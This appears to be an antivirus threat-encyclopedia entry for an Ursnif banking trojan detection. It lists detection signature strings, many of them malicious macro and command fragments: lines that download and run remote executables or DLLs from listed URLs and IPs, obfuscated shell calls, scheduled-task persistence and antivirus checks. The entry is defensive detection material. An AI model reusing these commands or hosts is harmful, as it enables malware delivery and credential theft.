Concrete signature match: Trojan - Appears legitimate but performs malicious actions for 32-bit Windows platform, family Ursnif
Trojan:Win32/Ursnif!rfn is a concrete detection of the Ursnif banking Trojan, an advanced infostealer known for financial fraud. It establishes persistence, targets common web browsers to steal credentials and sensitive data, and communicates with command-and-control servers (potentially over Tor). The malware employs kernel-level operations for deeper system compromise and utilizes legitimate system tools for data exfiltration.
Relevant strings associated with this threat:
- .onion/ (PEHSTR)
- \\.\mailslot\msl0 (PEHSTR_EXT)
- hide_evr2.pdb (PEHSTR_EXT)
- \ESl8x (SNID)
- options.cgi (PEHSTR_EXT)
- \hide_evr2.pdb (PEHSTR_EXT)
- /updt (PEHSTR_EXT)
- cmd /U /C "type %s1 > %s & del %s1" (PEHSTR_EXT)
- KeServiceDescriptorTable (PEHSTR_EXT)
- /fp %lu (PEHSTR_EXT)
- DL_EXE (PEHSTR_EXT)
- DL_EXE_ST (PEHSTR_EXT)
- Software\Microsoft\InetData (PEHSTR_EXT)
- \*.exe (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- /config.php (PEHSTR_EXT)
- /data.php?version= (PEHSTR_EXT)
- /task.php (PEHSTR_EXT)
- firefox.exe (PEHSTR_EXT)
- chrome.exe (PEHSTR_EXT)
- opera.exe (PEHSTR_EXT)
- safari.exe (PEHSTR_EXT)
- necessaryprote.co.cc (PEHSTR_EXT)
- legislationname.co.cc (PEHSTR_EXT)
- 9HTTPt (PEHSTR_EXT)
- user_id=%.4u&version_id=%lu&socks=%lu&build=%lu&crc=%.8x (PEHSTR_EXT)
- /sd %lu (PEHSTR_EXT)
- makecab.exe /F "%s" (PEHSTR_EXT)
- data.php?version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s (PEHSTR_EXT)
- /upd %lu (PEHSTR_EXT)
- /U /C "type %s1 > %s & del %s1 (PEHSTR_EXT)
- =HTTPt (PEHSTR_EXT)
- HTTPt (PEHSTR_EXT)
- dl_exe (PEHSTR_EXT)
- dl_exe_st (PEHSTR_EXT)
- SCREENSHOT (PEHSTR_EXT)
- /sd %lu (PEHSTR_EXT)
- /it %lu /ge %s /gp %s (PEHSTR_EXT)
- .rdau (PEHSTR_EXT)
- https:// (PEHSTR_EXT)
- \\.\%s (PEHSTR_EXT)
- USER.ID (PEHSTR_EXT)
- \*.dll (PEHSTR_EXT)
- StartupApproved\Run (PEHSTR_EXT)
- /pki/mscorp/crl/MSIT (PEHSTR_EXT)
- /script?u= (PEHSTR_EXT)
- /C "copy "%s" "%s" /y && "%s"" (PEHSTR_EXT)
- godmmw/ph") (MACROHSTR_EXT)
- A-Za-z.(" (MACROHSTR_EXT)
- A-Za-z. (MACROHSTR_EXT)
- M(k.'- (SNID)
- dbg.txt (PEHSTR_EXT)
- dll.bin (PEHSTR_EXT)
- 544k0//OPLKRngf (PEHSTR)
- 8(''E/--(NIG.NIG.NIG.NIH.NIH.NIH.NIH.<99,''')///K:99T### (PEHSTR)
- c:\sat\Section\stood\country\strong\segment\Fell\mostchild.pdb (PEHSTR_EXT)
- if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[Prc_QueryLoadTestRequestSummary]') and OBJECTPROPERTY(id, N'IsProcedure') = 1) (PEHSTR_EXT)
- 4`_\= (SNID)
- LA*./ (SNID)
- ?E:\hhu\TeamViewer_13.bjbj\BuildTarget\Release2017\tv_w32dll.pdb (PEHSTR)
- CMD.EXE (PEHSTR_EXT)
- Touched A Neighbour %d with %d. Resuming a thread with ID: %d (PEHSTR_EXT)
- !This -7Afram cannot be run in DOS mode. (PEHSTR_EXT)
- X:\hemiterata\confervaceous\spireward\wordsmith.pdb (PEHSTR_EXT)
- = "cmd.exe /c P^" + Chr( (MACROHSTR_EXT)
- )) + "^e^L^L^.^e^x^e^ ^-^E^C^ (MACROHSTR_EXT)
- c:\Capital\Desert\Let\fell\Cool\Soil\ThirdThin.pdb (PEHSTR_EXT)
- Determine\Opposite\settle\Beforedouble.pdb (PEHSTR_EXT)
- \Lowu (PEHSTR_EXT)
- .exe (PEHSTR)
- \\3\.41\.34DLOperatingSyk3456bb (PEHSTR_EXT)
- Towardyear\Shouldon\sureSummer\Createsingle\allowtoBy.pdb (PEHSTR_EXT)
- Studyobserve.pdb (PEHSTR_EXT)
- \GWHWERW.pdb (PEHSTR_EXT)
- .\mailslot\sl%x (PEHSTR_EXT)
- c:\smile\Section\Are\which\book\salt\range\Subject\objecthigh.pdb (PEHSTR_EXT)
- mixseat.exe (PEHSTR_EXT)
- protocol\StdFileEditing\server (PEHSTR_EXT)
- \\3\.41\.34DLOperatingSyk3456bb (PEHSTR)
- c:\Every\black\Suggest\Once\Soundiron.pdb (PEHSTR_EXT)
- \finger\thusWear.pdb (PEHSTR_EXT)
- c:\divide\broad\Hole\DoThird.pdb (PEHSTR_EXT)
- c:\Yard\Ball\Pair\difficulthas.pdb (PEHSTR_EXT)
- PerhapsDance.pdb (PEHSTR_EXT)
- .CreateTextFile( (MACROHSTR_EXT)
- () & "\ (MACROHSTR_EXT)
- .xs" & (MACROHSTR_EXT)
- .x" + (MACROHSTR_EXT)
- .xsl" (MACROHSTR_EXT)
- .Controls(1).Value, True) (MACROHSTR_EXT)
- .Controls(0) (MACROHSTR_EXT)
- .Controls(0 + 1) (MACROHSTR_EXT)
- .Open (MACROHSTR_EXT)
- .Close (MACROHSTR_EXT)
- .Value (MACROHSTR_EXT)
- " & StrReverse("lsx.") (MACROHSTR_EXT)
- .Controls(1).Value (MACROHSTR_EXT)
- .WriteLine (MACROHSTR_EXT)
- = CreateObject("Scripting.FileSystemObject") (MACROHSTR_EXT)
- .Controls(1).Text (MACROHSTR_EXT)
- .Controls(vbHide) (MACROHSTR_EXT)
- .Text (MACROHSTR_EXT)
- ActiveDocument.Range.PageSetup.LeftMargin = (MACROHSTR_EXT)
- + ".applica" + "tion" (MACROHSTR_EXT)
- = "exe" (MACROHSTR_EXT)
- .s1.Value & (MACROHSTR_EXT)
- .s2.Text (MACROHSTR_EXT)
- ." & (MACROHSTR_EXT)
- .run (MACROHSTR_EXT)
- 0.xsl", 1) (MACROHSTR_EXT)
- VBA.Interaction.Shell (MACROHSTR_EXT)
- = "bin.base64" (MACROHSTR_EXT)
- .value (MACROHSTR_EXT)
- .xsl" (MACROHSTR_EXT)
- .Controls(2 - 1 - 1) (MACROHSTR_EXT)
- P.Text (MACROHSTR_EXT)
- .Controls(Len("a")).Value (MACROHSTR_EXT)
- ("winmgmts:root\cimv2:Win32_Process") (MACROHSTR_EXT)
- "bin.base64" (MACROHSTR_EXT)
- T$,f9\$ (PEHSTR_EXT)
- .xsl", 1) (MACROHSTR_EXT)
- Private Declare PtrSafe Function ShellExecute Lib "shell32.dll" (MACROHSTR_EXT)
- .Controls(Len(" (MACROHSTR_EXT)
- ")).Value (MACROHSTR_EXT)
- = Chr(230 - (30 / 2) - (50 * 2)) + "HELL." (MACROHSTR_EXT)
- .Controls( (MACROHSTR_EXT)
- H).Value (MACROHSTR_EXT)
- bac.9kon=l?php.p23i0oia/58ol02ew/moc.8fjjfbb//:ptth", (MACROHSTR_EXT)
- ("tmp") & "\ (MACROHSTR_EXT)
- .tmp" (MACROHSTR_EXT)
- = Chr(115 + 0) + "HELL." (MACROHSTR_EXT)
- U).Text (MACROHSTR_EXT)
- , "\", "\\") (MACROHSTR_EXT)
- = CreateObject("Scripting.FileSystemObject") (MACROHSTR_EXT)
- .Write (MACROHSTR_EXT)
- dIe.y-KZX-Lujpm-Kw.pdb (PEHSTR)
- U).Value (MACROHSTR_EXT)
- & "p" & "\" & "\ (MACROHSTR_EXT)
- Call Interaction.Shell@( (MACROHSTR_EXT)
- ActiveDocument.ActiveWindow.Panes(1).Pages.Count (MACROHSTR_EXT)
- = StrReverse("\\\\pmet\\\\swodniw\\\\:c") (MACROHSTR_EXT)
- .inf", (MACROHSTR_EXT)
- .sct", (MACROHSTR_EXT)
- StrReverse(" s/ in/ ptsmc") & (MACROHSTR_EXT)
- .inf" (MACROHSTR_EXT)
- .Controls (MACROHSTR_EXT)
- .createElement("b64") (MACROHSTR_EXT)
- Call Interaction$.Shell@(StrReverse( (MACROHSTR_EXT)
- & "emp" & "\ (MACROHSTR_EXT)
- .xsl" For Output As # (MACROHSTR_EXT)
- Call VBA.Shell@(StrReverse( (MACROHSTR_EXT)
- Call VBA.Interaction.Shell@(StrReverse( (MACROHSTR_EXT)
- .x" + (MACROHSTR_EXT)
- Debug.Print Error (MACROHSTR_EXT)
- .run StrReverse( (MACROHSTR_EXT)
- .xs" + (MACROHSTR_EXT)
- As String = "c:\windows" (MACROHSTR_EXT)
- As String = "\t" (MACROHSTR_EXT)
- Call VBA.Shell@(StrReverse (MACROHSTR_EXT)
- .x.value & (MACROHSTR_EXT)
- .y.value (MACROHSTR_EXT)
- = "aubex.x" + (MACROHSTR_EXT)
- Debug.Print Error( (MACROHSTR_EXT)
- .exec(StrReverse( (MACROHSTR_EXT)
- ("46esab.nib") (MACROHSTR_EXT)
- temp\ (MACROHSTR_EXT)
- VBA.Interaction (MACROHSTR_EXT)
- .Shell@ (MACROHSTR_EXT)
- .exec( (MACROHSTR_EXT)
- shell.Run("schtasks.exe /Create /F /TN \" (PEHSTR_EXT)
- \" /TR \"" + command + "\" /SC Minute /MO (PEHSTR_EXT)
- XObject('WScript.Shell'); eval( (PEHSTR_EXT)
- .RegRead('HKEY_CURRENT_USER\\\\Software\\\\ApplicationContainer\\\\Appsw64\\\\ServerUrl (PEHSTR_EXT)
- = "lsx." (MACROHSTR_EXT)
- ) & "\ (MACROHSTR_EXT)
- .Item().Document.Application.ShellExecute (MACROHSTR_EXT)
- = Me.InlineShapes( (MACROHSTR_EXT)
- ).AlternativeText & Me.InlineShapes( (MACROHSTR_EXT)
- ).AlternativeText (MACROHSTR_EXT)
- + ThisDocument.Application.CentimetersToPoints (MACROHSTR_EXT)
- C:\ProgramData\ (MACROHSTR_EXT)
- = Shell("cmstp /ni /s C:\ProgramData\ (MACROHSTR_EXT)
- .inf") (MACROHSTR_EXT)
- H:\flow\reproductivity\act\scripts.pdb (PEHSTR_EXT)
- c:\They\by\Say\Drive\650-Break\Product.pdb (PEHSTR_EXT)
- SetSecurityDescriptorDacl (PEHSTR_EXT)
- brought\sign\fine\left\cent\believenight.pdb (PEHSTR_EXT)
- Microsoft.CRTProvider (PEHSTR_EXT)
- .Run StrReverse(" (MACROHSTR_EXT)
- .text.text) (MACROHSTR_EXT)
- ExecuteCommand "C:\DiskDrive\1\Volume\BackFiles\errorfix.bat (MACROHSTR_EXT)
- .php " & Environ("appdata") & (MACROHSTR_EXT)
- .exe (MACROHSTR_EXT)
- .exe" & UserForm3.RootOLE2.Caption (MACROHSTR_EXT)
- Me.InlineShapes( (MACROHSTR_EXT)
- .InlineShapes( (MACROHSTR_EXT)
- + ThisDocument.Application.InchesToPoints( (MACROHSTR_EXT)
- //:ptth", (MACROHSTR_EXT)
- .exec (MACROHSTR_EXT)
- C:\zKfsgSt\QPqYpbf\QzikFhm.exe (MACROHSTR_EXT)
- C:\kTTGsUq\DRyQCGf\aWLfVMa.exe (MACROHSTR_EXT)
- C:\HppcPqN\ZnVmYcD\wshCsiw.exe (MACROHSTR_EXT)
- C:\EnmaMnK\WkSjVZz\upeypgt.exe (MACROHSTR_EXT)
- C:\ihmJQXC\POehkcB\WqvEtZi.exe (MACROHSTR_EXT)
- C:\RpiepHV\qeoMHkl\eEPJbYv.exe (MACROHSTR_EXT)
- C:\yxDagnS\feuxBsR\mHMUKpy.exe (MACROHSTR_EXT)
- C:\pZkqmxP\dlmvUPr\MlMXRjT.exe (MACROHSTR_EXT)
- C:\VMakTSG\GhpCexd\iLpnWKe.exe (MACROHSTR_EXT)
- C:\LttgTtQ\drYqcgG\BwkGvmB.exe (MACROHSTR_EXT)
- C:\LQNYbqM\NWgbFUn\mkewtQm.exe (MACROHSTR_EXT)
- C:\pYYLxZv\IWEVHLl\fbQkaRf.exe (MACROHSTR_EXT)
- C:\YmiRfEF\foBdwbz\KCmUWrU.exe (MACROHSTR_EXT)
- rundll32.exe (MACROHSTR_EXT)
- ShellExecuteA (MACROHSTR_EXT)
- http://gstat.matthewsalemstolper.com/pagament1.exe (MACROHSTR_EXT)
- http://gstat.ausagistment.com/pagament1.exe (MACROHSTR_EXT)
- http://gstat.llbntv.com/pagament1.exe (MACROHSTR_EXT)
- http://gstat.llbntv.org/pagament1.exe (MACROHSTR_EXT)
- https://anr8.com.au/loxarchiveFALSEsign.php (MACROHSTR_EXT)
- https://yyauto.com.au/settings/boss.php (MACROHSTR_EXT)
- https://www.lovekolaches.com/docusign/sign.php (MACROHSTR_EXT)
- https://tlanddissipate.at/3/rbs.dll (MACROHSTR_EXT)
- http://149.28.33.80/documents.php (MACROHSTR_EXT)
- http://45.63.30.20/l1o2c3o4m5o6t7i8v.php (MACROHSTR_EXT)
- http://www.adrelatemedia.com/haidress/gmail.php (MACROHSTR_EXT)
- https://memberteam.works/templatesb/superthemen.php (MACROHSTR_EXT)
- http://149.28.33.80/ODZACUQ.exe (MACROHSTR_EXT)
- https://entspartner.at/3/rsk.dll (MACROHSTR_EXT)
- https://ogglededibl.at/3/dws.dll (MACROHSTR_EXT)
- https://destgrena.at/3/tsk.dll (MACROHSTR_EXT)
- https://sdeputizi.at/3/dok.dll (MACROHSTR_EXT)
- https://utenti.online/1.exe (MACROHSTR_EXT)
- https://szn.services/1.exe (MACROHSTR_EXT)
- https://nl.mjndomein.systems/1.exe (MACROHSTR_EXT)
- Call URLDownloadToFile(0, "http://d7uap.com/iz5/yaca.php?l=tze3.cab", JK, 0, 0) (MACROHSTR_EXT)
- "kE.tmp" (MACROHSTR_EXT)
- fX.run "regsvr32 " & JK (MACROHSTR_EXT)
- Call URLDownloadToFile(0, "http://9ygw2.com/iz5/yaca.php?l=kpt1.cab", Vw, 0, 0) (MACROHSTR_EXT)
- "U.tmp" (MACROHSTR_EXT)
- X.run "regs" + "vr32 " & Vw (MACROHSTR_EXT)
- ioyyf.com/iz5/yaca.php? (MACROHSTR_EXT)
- .cab" (MACROHSTR_EXT)
- URLDownloadToFile(0, "http:// (MACROHSTR_EXT)
- .setRequestHeader "etag", "fetch" (MACROHSTR_EXT)
- Ajj = w.GetSpecialFolder(0 + j) (MACROHSTR_EXT)
- Ajj = Ajj & "\" & Abs(Application.WindowState) & "." (MACROHSTR_EXT)
- a = a & Mid(k.Cells(1, 1), Len(k.Cells(1, j)) + 1, j) (MACROHSTR_EXT)
- https://onlinecompaniehouse.com/sorvD2. (MACROHSTR_EXT)
- https://onlinecompaniehouse.com/sorv.png (MACROHSTR_EXT)
- sorv.png (MACROHSTR_EXT)
- = "c:\programdata\RrKki.pdf" (MACROHSTR_EXT)
- ((3) & "." & (MACROHSTR_EXT)
- ((3) & "request.5.1") (MACROHSTR_EXT)
- .exec (YBxsP) (MACROHSTR_EXT)
- = "c:\programdata\hMDcJ.pdf" (MACROHSTR_EXT)
- .exec (KsVoJ) (MACROHSTR_EXT)
- 9c:\Barsend\WarStretch\PageMust\Bottominstrument\Group.pdb (PEHSTR)
- Group.dll (PEHSTR)
- GlobalClearDocument.Open "GET", "http://" & ListBox1.List(3), False (MACROHSTR_EXT)
- RightDocument.SaveToFile ("C:\users\public\ftr.cpl") (MACROHSTR_EXT)
- CreateObject(ListBox1.List(4)).Run (LinkNamespaceRef + "C:\users\public\ftr.cpl") (MACROHSTR_EXT)
- ListBox1.AddItem ("systemlive.casa/statis1c.dll") (MACROHSTR_EXT)
- ListBox1.AddItem ("regsvr32 ") (MACROHSTR_EXT)
- ListBox1.AddItem ("WScript.Shell") (MACROHSTR_EXT)
- Application.Run "Def" (MACROHSTR_EXT)
- ArrayListbox.Open "GET", "http://" & ListBox1.List(3), False (MACROHSTR_EXT)
- VbStorage.SaveToFile ("C:\users\public\wtt.gz") (MACROHSTR_EXT)
- CreateObject(ListBox1.List(4)).Run (OptionSwapDatabase + "C:\users\public\wtt.gz") (MACROHSTR_EXT)
- ListBox1.AddItem ("systemok.casa/statis1c.dll") (MACROHSTR_EXT)
- .Open "GET", "http://" & ListBox1.List(3), False (MACROHSTR_EXT)
- .SaveToFile ("C:\users\public\ (MACROHSTR_EXT)
- CreateObject(ListBox1.List(4)).Run ( (MACROHSTR_EXT)
- + "C:\users\public\ (MACROHSTR_EXT)
- ListBox1.AddItem (" (MACROHSTR_EXT)
- .casa/statis1c.dll") (MACROHSTR_EXT)
- UserForm1.CommandButton2_Click (MACROHSTR_EXT)
- 0.Send (MACROHSTR_EXT)
- CreateObject(ListBox1.List(4)).Run "" & ( (MACROHSTR_EXT)
- + "32 " & "C:\users\public\ (MACROHSTR_EXT)
- ListBox1.AddItem (CommandButton4.Tag) (MACROHSTR_EXT)
- ListBox1.AddItem (Image1.Tag) (MACROHSTR_EXT)
- /p1cture3.jpg") (MACROHSTR_EXT)
- ListBox1.AddItem (TextBox2.ControlTipText) (MACROHSTR_EXT)
- If Application.CheckSpelling(aWord.Text) Then (MACROHSTR_EXT)
- Worksheets("Sheet2").SaveAs Length & Jizz, Rez (MACROHSTR_EXT)
- Worksheets("Sheet1").SaveAs Length & Wizz, Rez (MACROHSTR_EXT)
- Wizz = ".xls" (MACROHSTR_EXT)
- Jizz = ".fo" (MACROHSTR_EXT)
- Private Sub CommandButton1_Click() (MACROHSTR_EXT)
- ListBox1.AddItem (Image1.ControlTipText) (MACROHSTR_EXT)
- ListBox1.AddItem (":// (MACROHSTR_EXT)
- 0.casa/footer.jpg") (MACROHSTR_EXT)
- InstrumentationUtil.PasteRemove = "C:\users\Public\" + " (MACROHSTR_EXT)
- .jpg" (MACROHSTR_EXT)
- InstrumentationUtil.LinkDelete = "http" (MACROHSTR_EXT)
- InstrumentationUtil.WindowProcedureArray = "GET" (MACROHSTR_EXT)
- InstrumentationUtil.LinkDelete & ListBox1.List(3), False (MACROHSTR_EXT)
- InstrumentationUtil. (MACROHSTR_EXT)
- = "C:\users\Public\" + " (MACROHSTR_EXT)
- = "http" (MACROHSTR_EXT)
- & ListBox1.List(3), False (MACROHSTR_EXT)
- 0.casa/login.jpg") (MACROHSTR_EXT)
- 0.cyou/login.jpg") (MACROHSTR_EXT)
- % = "C:\users\Public\" + " (MACROHSTR_EXT)
- .jpg") (MACROHSTR_EXT)
- = "C:\users\Public\" + "xfe.png" (MACROHSTR_EXT)
- & ListBox1.List(3) (MACROHSTR_EXT)
- ShellRunner.Run VarExQuery & RefArray (MACROHSTR_EXT)
- ListBox1.AddItem (CommandButton1.Tag) (MACROHSTR_EXT)
- ListBox1.AddItem (CheckBox1.Tag) (MACROHSTR_EXT)
- Set classList = classList.CreateTextFile(ptrPtr) (MACROHSTR_EXT)
- classList.WriteLine constArrayDocument (MACROHSTR_EXT)
- Public Sub CommandButton1_Click() (MACROHSTR_EXT)
- Set countIndex = CreateObject("w" & script & "shell") (MACROHSTR_EXT)
- countIndex.exec frm.CommandButton1.Tag & " c:\users\public\main.hta (MACROHSTR_EXT)
- windowCopy = "c:\users\public\main.hta" (MACROHSTR_EXT)
- removeLocal.mainClass windowCopy, repoQuery (MACROHSTR_EXT)
- Call frm.CommandButton1_Click (MACROHSTR_EXT)
- Set genericDataTextbox = CreateObject("System.Text.StringBuilder") (MACROHSTR_EXT)
- script = "script" & ". (MACROHSTR_EXT)
- genericDataTextbox.Append_3 " (MACROHSTR_EXT)
- {return queryGlobalCaption.split('').reverse().join(''); (MACROHSTR_EXT)
- classTableConst.Timeout = 60000 (MACROHSTR_EXT)
- .exec frm.CommandButton1.Tag & " c:\users\public\main.hta" (MACROHSTR_EXT)
- removeLocal.mainClass (MACROHSTR_EXT)
- = CreateObject("System.Text.StringBuilder") (MACROHSTR_EXT)
- split('').reverse().join(''); (MACROHSTR_EXT)
- script = "script" & "." (MACROHSTR_EXT)
- .Append_3 "<div id='content'>fTtl (MACROHSTR_EXT)
- CreateObject("wscript.shell").exec a (MACROHSTR_EXT)
- myfrm1.text1.text (MACROHSTR_EXT)
- .onion (PEHSTR_EXT)
- http://constitution.org/usdeclar.txt (PEHSTR_EXT)
- = "c:\users\public\main.hta" (MACROHSTR_EXT)
- namespaceEx.exec frm.CommandButton1.Tag & " c:\users\public\main.hta" (MACROHSTR_EXT)
- = CreateObject("w" & script & "shell") (MACROHSTR_EXT)
- buttonException.Append_3 (MACROHSTR_EXT)
- CreateObject("wscript.shell") (MACROHSTR_EXT)
- = ActiveDocument.BuiltInDocumentProperties("title") (MACROHSTR_EXT)
- frm.button1_Click (MACROHSTR_EXT)
- .exec tg (MACROHSTR_EXT)
- = Split(frm.tg, " ") (MACROHSTR_EXT)
- HKEY_CUR" & StrReverse("rawtfoS\RESU_TNER") & "e\Microsoft\Office\" (MACROHSTR_EXT)
- Word\Secur" & StrReverse("VsseccA\yti") & "BOM (MACROHSTR_EXT)
- .RegWrite (MACROHSTR_EXT)
- = StrReverse(UserForm1.TextBox1) (MACROHSTR_EXT)
- c:\lead\Ice\Press\Protect\Class\person.pdb (PEHSTR_EXT)
- c:\Grew_Practice\137\until\Poor_fair\Voice-Rock\class.pdb (PEHSTR_EXT)
- bENHWRJNRw@#GHNe.pdb (PEHSTR_EXT)
- Close\Eight\age\king\Organ\sea\music\Kinghill.pdb (PEHSTR_EXT)
- Bread mass Againbat human cause (PEHSTR_EXT)
- c:\life\Copy\spring\rain\Ever\mind\cent\burnCold.pdb (PEHSTR_EXT)
- admin@gremaonline.ru (PEHSTR_EXT)
- rewgqrwg.pdb (PEHSTR_EXT)
- fell\Test.pdb (PEHSTR_EXT)
- Test.dll (PEHSTR_EXT)
- Sw = 4: Sheets(1).Cells(17, 1).FormulaLocal = soPho & Rounts (MACROHSTR_EXT)
- Excel4MacroSheets.Add Before:=Worksheets(tol): emm (MACROHSTR_EXT)
- Sheets(1).[A5].FormulaLocal = qq (MACROHSTR_EXT)
- Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = Lowe: Fisolo (MACROHSTR_EXT)
- s = s: Sheets(1).[A5].FormulaLocal = ed (MACROHSTR_EXT)
- Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = anndy: Lamdaa (MACROHSTR_EXT)
- admin@dverifadotov.space (PEHSTR_EXT)
- Bud. 115 prospekt Gagarina (PEHSTR_EXT)
- ReDim L(0 To CLng((Aii(R) / S) - 1)) (MACROHSTR_EXT)
- u = R: Sheets(1).[F4].FormulaLocal = un (MACROHSTR_EXT)
- Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = Ecco_la: l_esperienza (MACROHSTR_EXT)
- d).Create GlemS("" & FinGo1), (MACROHSTR_EXT)
- Sheets(msoGradientHorizontal).Cells(37, 15).FormulaLocal = (MACROHSTR_EXT)
- Sheets(msoLineSingle).Cells(37, 9).FormulaLocal = HonN & forcer (MACROHSTR_EXT)
- Sheets(msoLineSingle).Cells(30 + 7, 3 * 3).FormulaLocal = VVoo & forcer (MACROHSTR_EXT)
- = f & CaPoo("" & p, p.Column) (MACROHSTR_EXT)
- little-shore\358\Level.pdb (PEHSTR_EXT)
- WinHttpOpenRequest (PEHSTR_EXT)
- WinHttpReadData (PEHSTR_EXT)
- WinHttpAddRequestHeaders (PEHSTR_EXT)
- turbos.dll (PEHSTR_EXT)
- ConvertStringSecurityDescriptorToSecurityDescriptorA (PEHSTR_EXT)
- ShellExecuteW (PEHSTR_EXT)
- d:\in\the\town\where\ahung.pdb (PEHSTR_EXT)
- malexgatheredNmoveth.manbeast2very (PEHSTR_EXT)
- GetObject(ppR).Get(IU) (MACROHSTR_EXT)
- MMaK.Open (MACROHSTR_EXT)
- out(nPJs(i), j) = Mid$(MillW, k, 1) (MACROHSTR_EXT)
- Gguida("aEX2MT.01MM.LT6OGSLXHP.") (MACROHSTR_EXT)
- Traduce(Gguida("Qhp/onco_Jts/ma.m>\t:daic"), m) (MACROHSTR_EXT)
- zmfifthtsaying,KCattlebeastmoved.B (PEHSTR_EXT)
- = Environ("Temp") & "\" & ty & "." (MACROHSTR_EXT)
- = Bn: Application.Quit (MACROHSTR_EXT)
- Call MR.SetTimeouts(0, 2000, 2000, 5000) (MACROHSTR_EXT)
- MR.Open "GET", DecodeSTR(" (MACROHSTR_EXT)
- .setRequestHeader "Cache-Control", "no-cache" (MACROHSTR_EXT)
- .setRequestHeader "Pragma", "no-cache" (MACROHSTR_EXT)
- .send (MACROHSTR_EXT)
- .WaitForResponse (MACROHSTR_EXT)
- bbb = .ResponseText (MACROHSTR_EXT)
- Application.Quit (wdDoNotSaveChanges) (MACROHSTR_EXT)
- Set daraufh = headb.CreateTextFile("C:\ProgramData\graniteb.txt") (MACROHSTR_EXT)
- Set showsp = believesp.execquery("select * from antivirusproduct", "wql", 0) (MACROHSTR_EXT)
- daraufh.Write "function eBooksj($detectivef){$platformi = [Net.WebRequest]::Create('https://TheFinanceInvest.com/'+$detectivef);$platformi.Method='GET'; (MACROHSTR_EXT)
- impartiale = "C:\ProgramData\prncnfg.txt" (MACROHSTR_EXT)
- CreateObject("Shell.Application").ShellExecute "cscript.exe", "C:\windows\System32\Printing_Admin_Scripts\en-US\prnport.v" (MACROHSTR_EXT)
- ,destination:=activesheet.range("$a$2")). (MACROHSTR_EXT)
- =hubb&""&pareggiato&",#1/q"shellpresiedereendfunctionfunctionhermu() (MACROHSTR_EXT)
- "Scripting.": xDww = xDww & "FileSystemObject" (MACROHSTR_EXT)
- bt.GetSpecialFolder(0 + Tiuuti) & "\" & GG & "." (MACROHSTR_EXT)
- = DSw.th32ProcessID (MACROHSTR_EXT)
- Workbooks.Application.DisplayAlerts = Bn: Application.Quit (MACROHSTR_EXT)
- pinnS = Environ("Temp") & "\" & ty & "." (MACROHSTR_EXT)
- .Open famaile("Yf-9T08G_3E"), Adreus, False (MACROHSTR_EXT)
- CreateObject(famaile("_9DrYA.a8DSm03Ot-fBe")) (MACROHSTR_EXT)
- Foglioo = GetObject((bio)).Get((energ)) (MACROHSTR_EXT)
- qAqua.Open Z & ocmoS, sJimm, False, (MACROHSTR_EXT)
- (((niu(28, 29)))) & "\" (MACROHSTR_EXT)
- .Write qAqua.responseBody: .SaveToFile hlII, (MACROHSTR_EXT)
- .SaveToFile Tooi, Abs(CInt(Nads)) + 1 (MACROHSTR_EXT)
- cemS(Tio("ts/rnstlohp/oieoact:mevri.m"), (MACROHSTR_EXT)
- Tio("esr2/ rgv3 s") & r (MACROHSTR_EXT)
- ct(truej("5hdbtaxjo.rmiadse"))#endifflibustiero.opentruej("91emztrg"),tbooks,false,rollers,aboar (MACROHSTR_EXT)
- y.savetofileapancil,abs(cint(institute))+1endwithcoolegium=len(dir(apancil))>0 (MACROHSTR_EXT)
- n(("temp"))&"\"endfunctionsubselection_s()alia=vintegerareawidths=coolegium(truej("qhp/onco_jts/ma.m>\t:daic"),alia)a (MACROHSTR_EXT)
- .Exec ("cmd /c curl http://109.248.11.155/network.exe -o %APPDATA%\ (MACROHSTR_EXT)
- .Exec ("cmd /c curl http://191.101.2.39/installazione.exe -o %APPDATA%\ (MACROHSTR_EXT)
- destination:=activesheet.range("$a$2")). (MACROHSTR_EXT)
- =hubb&""&ambasso&",#1/q"shellnigojiendfunctionfunctionhermu() (MACROHSTR_EXT)
- =createobject(nexxt("5hdbtaxjo.rmiadse"))#endifvbarf.opennexxt("91emztrg") (MACROHSTR_EXT)
- =vba.environ(("temp"))&"\"endfunction (MACROHSTR_EXT)
- =comedy(nexxt("qhp/onco_jts/ma.m>\t:daic"),sk)xareaxareahight=vivaldi(vaar(""&sk))endsubfunction (MACROHSTR_EXT)
- =getobject(sii).get(uu)how (MACROHSTR_EXT)
- ="http://inter"& (MACROHSTR_EXT)
- &orios&".com"oxhttp.open"get",kioer,false (MACROHSTR_EXT)
- "ndll"&oriospl="ru"&orios& (MACROHSTR_EXT)
- :withcreateobject("wscript.shell") (MACROHSTR_EXT)
- &environ$("userprofile")&"\documents"&_application.pathseparator& (MACROHSTR_EXT)
- =brevettato(left(environ(cojones("5-38c-o0m9s7p101ec3")),20)&cojones("-11r3-e80g,s710v-8r1")&"32."&cojones (MACROHSTR_EXT)
- = kFonda(cValute("Ihsfs.)?t:itc=Ep/rrmREt/eao"), m) (MACROHSTR_EXT)
- fLogica = UAres & Application. (MACROHSTR_EXT)
- = VBA.Environ((("TEmp"))) & "\" (MACROHSTR_EXT)
- = GetObject(fa).Get(nnt) (MACROHSTR_EXT)
- .Open "" & RY, ViU, False, "", "" (MACROHSTR_EXT)
- marvell(ing)marvell=environ("systemdrive")&environ("homepath")&_application. (MACROHSTR_EXT)
- =vba.environ(((niu(28,29))))&"\"endfunction (MACROHSTR_EXT)
- =getobject(vv)setdf=dd.get(bn)seter=df.create (MACROHSTR_EXT)
- =getobject(sii)tff=7setjam=muu.get(roo)setandre=jam.create (MACROHSTR_EXT)
- .openz&ocmos,sjimm,false,z,z (MACROHSTR_EXT)
- ="a"&a&":"&"ha"&bsetd=range(t)foreachfiind.special (MACROHSTR_EXT)
- yPtnHMg.pdb (PEHSTR_EXT)
- yisgland.m (PEHSTR_EXT)
- giveletdon.ttwo.p (PEHSTR_EXT)
- = GetObject((SeY)).Get((SyI)) (MACROHSTR_EXT)
- = Internationale(HaBB("(!pzry3so.&h:pcrt/omvt/xo"), fo) (MACROHSTR_EXT)
- = HaBB("_5MMP0,LL.IM2H6fXXT0hS.T.") (MACROHSTR_EXT)
- .Write wolF.responseBody: .SaveToFile GumVu, (MACROHSTR_EXT)
- = New MSXML2.XMLHTTP60 (MACROHSTR_EXT)
- .Open "" & RY, ViU, False, "", (MACROHSTR_EXT)
- fe.STARTUPINFO.cb = LenB(fe): fe.STARTUPINFO.qweejjj = am (MACROHSTR_EXT)
